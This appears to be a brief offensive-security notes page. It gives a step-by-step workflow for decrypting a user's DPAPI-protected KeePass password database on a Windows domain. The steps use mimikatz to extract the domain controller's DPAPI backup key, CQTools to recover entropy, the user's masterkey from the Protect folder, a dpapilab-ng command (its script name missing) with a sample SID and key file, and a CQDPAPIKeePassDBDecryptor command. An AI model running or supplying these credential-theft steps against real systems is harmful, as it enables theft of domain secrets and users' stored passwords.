In the Open



  • tjldeneut's dpaping-lab
  • BlackDiverX's unpacked cqtools
  • Use CQTools with care, CQMasterKeyAD.exe does not work correctly. It will drive you mad. Here is the workaround Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
    • Get the pvk backup key from the DC via mimikatz
    • Get the entropy via CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe
    • Get the encrypted blob
    • Get the user's Masterkey under C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\
    • Use dpapilab-ng's
./  --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk  --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin 
* Use the decrypted blob to
CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
  • Open the *.kdbx file